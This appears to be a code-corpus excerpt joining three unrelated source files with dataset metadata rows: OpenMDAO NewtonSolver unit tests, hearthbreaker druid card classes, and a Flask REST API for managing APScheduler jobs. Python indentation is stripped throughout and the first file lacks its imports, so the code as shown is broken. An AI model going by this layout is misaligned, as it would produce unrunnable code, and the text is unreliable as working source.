# pylint: disable=F0401,E0611
from openmdao.lib.drivers.newton_solver import NewtonSolver
from openmdao.lib.optproblems.scalable import Discipline
from openmdao.lib.optproblems.sellar import Discipline1_WithDerivatives, \
Discipline2_WithDerivatives, \
Discipline1, Discipline2
from openmdao.main.api import Assembly, Component, set_as_top, Driver
from openmdao.main.hasparameters import HasParameters
from openmdao.main.interfaces import IHasParameters, implements
from openmdao.main.test.simpledriver import SimpleDriver
from openmdao.main.datatypes.api import Float
from openmdao.test.execcomp import ExecComp, ExecCompWithDerivatives
from openmdao.util.testutil import assert_rel_error
from openmdao.util.decorators import add_delegate
class Sellar_MDA(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_subbed(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('subdriver', NewtonSolver())
self.driver.workflow.add(['subdriver'])
self.subdriver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_Mixed(Assembly):
def configure(self):
self.add('d1', Discipline1())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_Mixed_Flipped(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_None(Assembly):
def configure(self):
self.add('d1', Discipline1())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Scalable_MDA(Assembly):
def configure(self):
self.add('d1', Discipline(prob_size=2))
self.add('d2', Discipline(prob_size=2))
self.connect('d1.y_out', 'd2.y_in')
#self.connect('d2.y_out', 'd1.y_in')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y_in', low=-1e99, high=1e99)
self.driver.add_constraint('d2.y_out = d1.y_in')
##self.driver.add_constraint('d1.y_in = d2.y_out')
class Newton_SolverTestCase(unittest.TestCase):
"""test the Newton Solver component"""
def setUp(self):
self.top = set_as_top(Sellar_MDA())
def tearDown(self):
self.top = None
def test_newton(self):
print self.top.d1.y1, self.top.d2.y1, self.top.d1.y2, self.top.d2.y2
self.top.run()
print self.top.d1.y1, self.top.d2.y1, self.top.d1.y2, self.top.d2.y2
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_flip_constraint(self):
self.top.driver.clear_constraints()
self.top.driver.add_constraint('d2.y2 = d1.y2')
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_mixed(self):
self.top = set_as_top(Sellar_MDA_Mixed())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_mixed_flipped(self):
self.top = set_as_top(Sellar_MDA_Mixed_Flipped())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_none(self):
self.top = set_as_top(Sellar_MDA_None())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_scalable_newton(self):
# This verifies that it works for arrays
self.top = set_as_top(Scalable_MDA())
self.top.d1.x = self.top.d2.x = numpy.array([[3.0], [-1.5]])
self.top.d1.z = self.top.d2.z = numpy.array([[-1.3], [2.45]])
self.top.d1.C_y = numpy.array([[1.1, 1.3], [1.05, 1.13]])
self.top.d2.C_y = numpy.array([[0.95, 0.98], [0.97, 0.95]])
self.top.run()
assert_rel_error(self, self.top.d1.y_out[0],
self.top.d2.y_in[0],
1.0e-4)
assert_rel_error(self, self.top.d1.y_out[1],
self.top.d2.y_in[1],
1.0e-4)
assert_rel_error(self, self.top.d2.y_out[0],
self.top.d1.y_in[0],
1.0e-4)
assert_rel_error(self, self.top.d2.y_out[1],
self.top.d1.y_in[1],
1.0e-4)
def test_general_solver(self):
a = set_as_top(Assembly())
comp = a.add('comp', ExecComp(exprs=["f=a * x**n + b * x - c"]))
comp.n = 77.0/27.0
comp.a = 1.0
comp.b = 1.0
comp.c = 10.0
comp.x = 0.0
driver = a.add('driver', NewtonSolver())
driver.workflow.add('comp')
driver.add_parameter('comp.x', 0, 100)
driver.add_constraint('comp.f=0')
self.top.driver.gradient_options.fd_step = 0.01
self.top.driver.gradient_options.fd_step_type = 'relative'
a.run()
assert_rel_error(self, a.comp.x, 2.06720359226, .0001)
assert_rel_error(self, a.comp.f, 0, .0001)
# The following test generates warnings due to nans and infs in u and df
# vectors in the newton backtracking. The test doesn't actually check
# anything except apparently that we don't raise an exception, so it's
# not really a good test.
#def test_initial_run(self):
#class MyComp(Component):
#x = Float(0.0, iotype='in')
#xx = Float(0.0, iotype='in', low=-100000, high=100000)
#f_x = Float(iotype='out')
#y = Float(iotype='out')
#def execute(self):
#if self.xx != 1.0:
#self.raise_exception("Lazy", RuntimeError)
#self.f_x = 2.0*self.x
#self.y = self.x
#@add_delegate(HasParameters)
#class SpecialDriver(Driver):
#implements(IHasParameters)
#def execute(self):
#self.set_parameters([1.0])
#top = set_as_top(Assembly())
#top.add('comp', MyComp())
#top.add('driver', NewtonSolver())
#top.add('subdriver', SpecialDriver())
#top.driver.workflow.add('subdriver')
#top.subdriver.workflow.add('comp')
#top.subdriver.add_parameter('comp.xx')
#top.driver.add_parameter('comp.x')
#top.driver.add_constraint('comp.y = 1.0')
#top.driver.max_iteration = 2
#top.run()
def test_newton_nested(self):
# Make sure derivatives across the newton-solved system are correct.
top = set_as_top(Assembly())
top.add('driver', SimpleDriver())
top.add('d1', Discipline1_WithDerivatives())
top.d1.x1 = 1.0
top.d1.y1 = 1.0
top.d1.y2 = 1.0
top.d1.z1 = 5.0
top.d1.z2 = 2.0
top.add('d2', Discipline2_WithDerivatives())
top.d2.y1 = 1.0
top.d2.y2 = 1.0
top.d2.z1 = 5.0
top.d2.z2 = 2.0
top.connect('d1.y1', 'd2.y1')
top.add('solver', NewtonSolver())
top.solver.atol = 1e-9
top.solver.workflow.add(['d1', 'd2'])
top.solver.add_parameter('d1.y2', low=-1e99, high=1e99)
top.solver.add_constraint('d1.y2 = d2.y2')
top.driver.workflow.add(['solver'])
top.driver.add_parameter('d1.z1', low=-100, high=100)
top.driver.add_objective('d1.y1 + d1.y2')
top.run()
J = top.driver.calc_gradient(mode='forward')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
J = top.driver.calc_gradient(mode='adjoint')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
top.driver.gradient_options.fd_step = 1e-7
top.driver.gradient_options.fd_form = 'central'
J = top.driver.calc_gradient(mode='fd')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
def test_equation(self):
top = set_as_top(Assembly())
top.add('precomp', ExecCompWithDerivatives(['y=x'],
['dy_dx = 1']))
top.precomp.x = 1.0
expr = ['y = 3.0*x*x -4.0*x']
deriv = ['dy_dx = 6.0*x -4.0']
top.add('comp', ExecCompWithDerivatives(expr, deriv))
top.driver.workflow.add(['comp'])
top.add('driver', NewtonSolver())
top.driver.add_parameter('comp.x')
top.driver.add_constraint('precomp.y - comp.y = 1.0 - 2.0')
top.run()
print top.comp.x, top.comp.y
assert_rel_error(self, top.comp.x, -0.38742588, 1e-4)
class Sellar_MDA_Cycles(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
class SysX(Component):
z = Float(1.0, iotype='in')
x = Float(1.0, iotype='out')
def execute(self):
self.x = 0.8*self.z + 2
def provideJ(self):
return numpy.array([[0.8]])
def list_deriv_vars(self):
return ['z'], ['x']
class SysY(Component):
x = Float(1.0, iotype='in')
z = Float(1.0, iotype='in')
y = Float(1.0, iotype='out')
def execute(self):
self.y = -0.2*self.z + 4.0*self.x + 3
def provideJ(self):
return numpy.array([[4.0, -0.2]])
def list_deriv_vars(self):
return ['x', 'z'], ['y']
class SysZ(Component):
x = Float(1.0, iotype='in')
y = Float(1.0, iotype='in')
z = Float(1.0, iotype='out')
def execute(self):
self.z = 1.0*self.x - 1.0*self.y - 1.0
def provideJ(self):
return numpy.array([[1.0, -1.0]])
def list_deriv_vars(self):
return ['x', 'y'], ['z']
class DoubleCycle(Assembly):
def configure(self):
self.add('SysX', SysX())
self.add('SysY', SysY())
self.add('SysZ', SysZ())
self.connect('SysX.x', 'SysY.x')
self.connect('SysX.x', 'SysZ.x')
self.connect('SysY.y', 'SysZ.y')
self.connect('SysZ.z', 'SysX.z')
self.connect('SysZ.z', 'SysY.z')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['SysX', 'SysY', 'SysZ'])
#self.driver.add_parameter('SysX.z')
#self.driver.add_constraint('SysX.z = SysZ.z')
class DoubleCycle_1PC(Assembly):
def configure(self):
self.add('SysX', SysX())
self.add('SysY', SysY())
self.add('SysZ', SysZ())
self.connect('SysX.x', 'SysY.x')
self.connect('SysX.x', 'SysZ.x')
self.connect('SysY.y', 'SysZ.y')
self.connect('SysZ.z', 'SysY.z')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['SysX', 'SysY', 'SysZ'])
self.driver.add_parameter('SysX.z')
self.driver.add_constraint('SysX.z = SysZ.z')
class Newton_SolverTestCase_with_Cycles(unittest.TestCase):
"""test the Newton Solver component with cycles"""
def setUp(self):
self.top = set_as_top(Sellar_MDA_Cycles())
def tearDown(self):
self.top = None
def test_newton(self):
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_nested(self):
# Make sure derivatives across the newton-solved system are correct.
top = set_as_top(Assembly())
top.add('driver', SimpleDriver())
top.add('d1', Discipline1_WithDerivatives())
top.d1.x1 = 1.0
top.d1.y1 = 1.0
top.d1.y2 = 1.0
top.d1.z1 = 5.0
top.d1.z2 = 2.0
top.add('d2', Discipline2_WithDerivatives())
top.d2.y1 = 1.0
top.d2.y2 = 1.0
top.d2.z1 = 5.0
top.d2.z2 = 2.0
top.connect('d1.y1', 'd2.y1')
top.connect('d2.y2', 'd1.y2')
top.add('solver', NewtonSolver())
top.solver.atol = 1e-9
top.solver.workflow.add(['d1', 'd2'])
top.driver.workflow.add(['solver'])
top.driver.add_parameter('d1.z1', low=-100, high=100)
top.driver.add_objective('d1.y1 + d1.y2')
top.run()
J = top.driver.calc_gradient(mode='forward')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
J = top.driver.calc_gradient(mode='adjoint')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
top.driver.gradient_options.fd_step = 1e-7
top.driver.gradient_options.fd_form = 'central'
J = top.driver.calc_gradient(mode='fd')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
def test_for_push_scatters(self):
# This test will fail when we go to push scatters. The problem is
# that Newton (and linear Gauss Siedel) both need to poke values
# directly into the u vector and expects those values to be
# scattered. To make it work, we need to manually scatter them during
# execution of those solvers.
top = set_as_top(DoubleCycle_1PC())
top.run()
assert_rel_error(self, top.SysX.x, -0.5, .0001)
assert_rel_error(self, top.SysY.y, 1.625, .0001)
assert_rel_error(self, top.SysZ.z, -3.125, .0001)
def test_for_push_scatters__cycle_only(self):
# This test will fail when we go to push scatters. See Above.
# However, this flavor of the test was added because of a key error
# in the code that finds the smallest edges to break.
top = set_as_top(DoubleCycle())
top.run()
assert_rel_error(self, top.SysX.x, -0.5, .0001)
assert_rel_error(self, top.SysY.y, 1.625, .0001)
assert_rel_error(self, top.SysZ.z, -3.125, .0001)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | 6,668,682,735,263,272,000 | 28.528053 | 77 | 0.532525 | false |
jirenz/CS229_Project | hearthbreaker/cards/minions/druid.py | 1 | 11367 | from hearthbreaker.cards.base import MinionCard, ChoiceCard
from hearthbreaker.game_objects import Minion
from hearthbreaker.tags.action import Give, Damage, Silence, Transform, Draw, Heal, \
Summon, AddCard, GiveManaCrystal, Remove, Kill
from hearthbreaker.tags.base import Choice, Buff, Effect, Battlecry, Deathrattle, ActionTag
from hearthbreaker.tags.card_source import CardList, ObjectSource
from hearthbreaker.tags.condition import IsType, GreaterThan
from hearthbreaker.tags.event import Damaged, TurnEnded
from hearthbreaker.tags.selector import CharacterSelector, MinionSelector, SelfSelector, UserPicker, BothPlayer, \
PlayerSelector, HeroSelector, Count, DeadMinionSelector
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.tags.status import ChangeAttack, ChangeHealth, Taunt, ManaChange
from hearthbreaker.cards.spells.neutral import spare_part_list
class Moonfire(ChoiceCard):
def __init__(self):
super().__init__("Moonfire", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="moonfire_keeper")
class Dispel(ChoiceCard):
def __init__(self):
super().__init__("Dispel", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class KeeperOfTheGrove(MinionCard):
def __init__(self):
super().__init__("Keeper of the Grove", 4, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(Moonfire(), Damage(2), CharacterSelector(players=BothPlayer(), picker=UserPicker())),
Choice(Dispel(), Silence(), MinionSelector(players=BothPlayer(), picker=UserPicker()))
])
def create_minion(self, player):
return Minion(2, 4)
class CatDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (cat)")
def create_minion(self, p):
return Minion(4, 4, charge=True)
class BearDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (bear)")
def create_minion(self, p):
return Minion(4, 6, taunt=True)
class CatForm(ChoiceCard):
def __init__(self):
super().__init__("Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class BearForm(ChoiceCard):
def __init__(self):
super().__init__("Bear Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheClaw(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(CatForm(), Transform(CatDruid()), SelfSelector()),
Choice(BearForm(), Transform(BearDruid()), SelfSelector())
])
def create_minion(self, player):
return Minion(4, 4)
class AncientSecrets(ChoiceCard):
def __init__(self):
super().__init__("Ancient Secrets", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientTeachings(ChoiceCard):
def __init__(self):
super().__init__("Ancient Teachings", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfLore(MinionCard):
def __init__(self):
super().__init__("Ancient of Lore", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(AncientSecrets(), Heal(5), HeroSelector()),
Choice(AncientTeachings(), Draw(3), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 5)
class Health(ChoiceCard):
def __init__(self):
super().__init__("Rooted", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class Attack(ChoiceCard):
def __init__(self):
super().__init__("Uproot", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfWar(MinionCard):
def __init__(self):
super().__init__("Ancient of War", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(Health(), Give([Buff(ChangeHealth(5)), Buff(Taunt())]), SelfSelector()),
Choice(Attack(), Give([Buff(ChangeAttack(5))]), SelfSelector()),
])
def create_minion(self, player):
return Minion(5, 5)
class IronbarkProtector(MinionCard):
def __init__(self):
super().__init__("Ironbark Protector", 8, CHARACTER_CLASS.DRUID,
CARD_RARITY.COMMON)
def create_minion(self, player):
return Minion(8, 8, taunt=True)
class TauntTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="Treant (taunt)")
def create_minion(self, p):
return Minion(2, 2, taunt=True)
class Treant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
def create_minion(self, _):
return Minion(2, 2)
class ChargeTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, ref_name="Treant (charge)")
def create_minion(self, player):
return Minion(2, 2, charge=True, effects=[Effect(TurnEnded(), ActionTag(Kill(), SelfSelector()))])
class PoisonSeedsTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False,
ref_name="Treant (poison seeds)")
def create_minion(self, player):
return Minion(2, 2)
class Panther(MinionCard):
def __init__(self):
super().__init__("Panther", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST)
def create_minion(self, _):
return Minion(3, 2, MINION_TYPE.BEAST)
class IncreaseStats(ChoiceCard):
def __init__(self):
super().__init__("Give your other minions +2/+2 and taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class SummonTreants(ChoiceCard):
def __init__(self):
super().__init__("Summon two 2/2 Treants with taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class Cenarius(MinionCard):
def __init__(self):
super().__init__("Cenarius", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, choices=[
Choice(IncreaseStats(), Give([Buff(ChangeAttack(2)),
Buff(ChangeHealth(2)),
Buff(Taunt())]), MinionSelector()),
Choice(SummonTreants(), Summon(TauntTreant(), 2), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 8)
class AttackMode(ChoiceCard):
def __init__(self):
super().__init__("Attack Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class TankMode(ChoiceCard):
def __init__(self):
super().__init__("Tank Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AnodizedRoboCub(MinionCard):
def __init__(self):
super().__init__("Anodized Robo Cub", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
minion_type=MINION_TYPE.MECH,
choices=[Choice(AttackMode(), Give([Buff(ChangeAttack(1))]), SelfSelector()),
Choice(TankMode(), Give([Buff(ChangeHealth(1))]), SelfSelector())])
def create_minion(self, player):
return Minion(2, 2, taunt=True)
class MechBearCat(MinionCard):
def __init__(self):
super().__init__("Mech-Bear-Cat", 6, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, minion_type=MINION_TYPE.MECH)
def create_minion(self, player):
return Minion(7, 6, effects=[Effect(Damaged(),
ActionTag(AddCard(CardList(spare_part_list)), PlayerSelector()))])
class CobraForm(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Fang (cobra)")
def create_minion(self, player):
return Minion(7, 7)
class DruidOfTheFang(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
battlecry=Battlecry(Transform(CobraForm()), SelfSelector(),
GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.BEAST))), value=0)))
def create_minion(self, player):
return Minion(4, 4)
class Malorne(MinionCard):
def __init__(self):
super().__init__("Malorne", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, minion_type=MINION_TYPE.BEAST)
def create_minion(self, player):
return Minion(9, 7, deathrattle=[Deathrattle(AddCard(ObjectSource(SelfSelector()),
add_to_deck=True), PlayerSelector()),
Deathrattle(Remove(), SelfSelector())])
class GiftOfMana(ChoiceCard):
def __init__(self):
super().__init__("Gift of Mana", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GiftOfCards(ChoiceCard):
def __init__(self):
super().__init__("Gift of Cards", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GroveTender(MinionCard):
def __init__(self):
super().__init__("Grove Tender", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(GiftOfMana(), GiveManaCrystal(), PlayerSelector(players=BothPlayer())),
Choice(GiftOfCards(), Draw(), PlayerSelector(players=BothPlayer()))
])
def create_minion(self, player):
return Minion(2, 4)
class FlameCat(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (cat)")
def create_minion(self, p):
return Minion(5, 2)
class FlameBird(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (bird)")
def create_minion(self, p):
return Minion(2, 5)
class FlameCatForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class FlameBirdForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Bird Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheFlame(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(FlameCatForm(), Transform(FlameCat()), SelfSelector()),
Choice(FlameBirdForm(), Transform(FlameBird()), SelfSelector())
])
def create_minion(self, player):
return Minion(2, 2)
class VolcanicLumberer(MinionCard):
def __init__(self):
super().__init__("Volcanic Lumberer", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE,
buffs=[Buff(ManaChange(Count(DeadMinionSelector(players=BothPlayer())), -1))])
def create_minion(self, player):
return Minion(7, 8, taunt=True)
| mit | 5,221,729,277,601,726,000 | 34.521875 | 118 | 0.622064 | false |
honmaple/flask-apscheduler | sche/api.py | 1 | 6046 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# **************************************************************************
# Copyright © 2016 jianglin
# File Name: api.py
# Author: jianglin
# Email: [email protected]
# Created: 2016-11-11 16:05:44 (CST)
# Last Update: Sunday 2018-09-30 17:50:04 (CST)
# By:
# Description:
# **************************************************************************
from flask import request
from flask import Blueprint
from flask.views import MethodView
from apscheduler.jobstores.base import ConflictingIdError, JobLookupError
from sche import sche
from .utils import HTTP, Serializer
import json
class ScheView(MethodView):
def get(self):
ins = sche.status()
return HTTP.OK(data=ins)
def post(self):
"""start scheduler."""
if not sche.running:
sche.start(paused=True)
ins = sche.status()
return HTTP.OK(data=ins)
def delete(self):
"""shutdown scheduler."""
if sche.running:
sche.resume()
ins = sche.status()
return HTTP.OK(data=ins)
class ScheJobView(MethodView):
def get(self):
request_data = request.args.to_dict()
trigger = request_data.get('trigger')
jobs = sche.get_jobs()
ins = Serializer(jobs, trigger=trigger).data
return HTTP.OK(data=ins)
def post(self):
'''
:param trigger:date or interval or crontab
:param job:if job is None,the default func is http_request
'''
request_data = request.get_json()
trigger = request_data.get('trigger')
kwargs = request_data.get('kwargs')
if trigger == 'interval' and kwargs:
request_data['kwargs'] = json.loads(kwargs)
try:
job = sche.add_job(**request_data)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except ConflictingIdError:
msg = 'Job ID %s is exists' % request_data.get('id')
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def put(self):
request_data = request.get_json()
job_ids = request_data.pop('jobs', [])
success_ids = []
for pk in job_ids:
try:
sche.remove_job(pk)
msg = 'Job ID %s delete success' % pk
success_ids.append(pk)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
msg = '{} delete success!'.format(','.join(success_ids))
return HTTP.OK(data=success_ids, message=msg)
class ScheJobItemView(MethodView):
def get(self, pk):
job = sche.get_job(pk)
if not job:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
ins = Serializer(job).data
return HTTP.OK(data=ins)
def put(self, pk):
request_data = request.get_json()
try:
sche.modify_job(pk, **request_data)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def delete(self, pk):
try:
sche.remove_job(pk)
msg = 'Job ID %s delete success' % pk
return HTTP.OK(message=msg)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobPauseView(MethodView):
def post(self, pk):
"""Pauses a job."""
try:
sche.pause_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobResumeView(MethodView):
def post(self, pk):
"""Resumes a job."""
try:
sche.resume_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobExecuteView(MethodView):
def post(self, pk):
"""Executes a job."""
try:
sche.run_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def init_app(app, url_prefix='/api/scheduler'):
site = Blueprint('sche', __name__, url_prefix=url_prefix)
sche_endpoint = [
("/status", ScheView.as_view('status')),
("", ScheJobView.as_view('job')),
("/<pk>", ScheJobItemView.as_view('job_item')),
('/<pk>/pause', ScheJobPauseView.as_view('job_pause')),
('/<pk>/resume', ScheJobResumeView.as_view('job_resume')),
('/<pk>/execute', ScheJobExecuteView.as_view('job_execute')),
]
for url, endpoint in sche_endpoint:
site.add_url_rule(
url,
view_func=endpoint,
)
app.register_blueprint(site)
| bsd-3-clause | 1,439,876,263,449,702,100 | 30.649215 | 76 | 0.540116 | false |
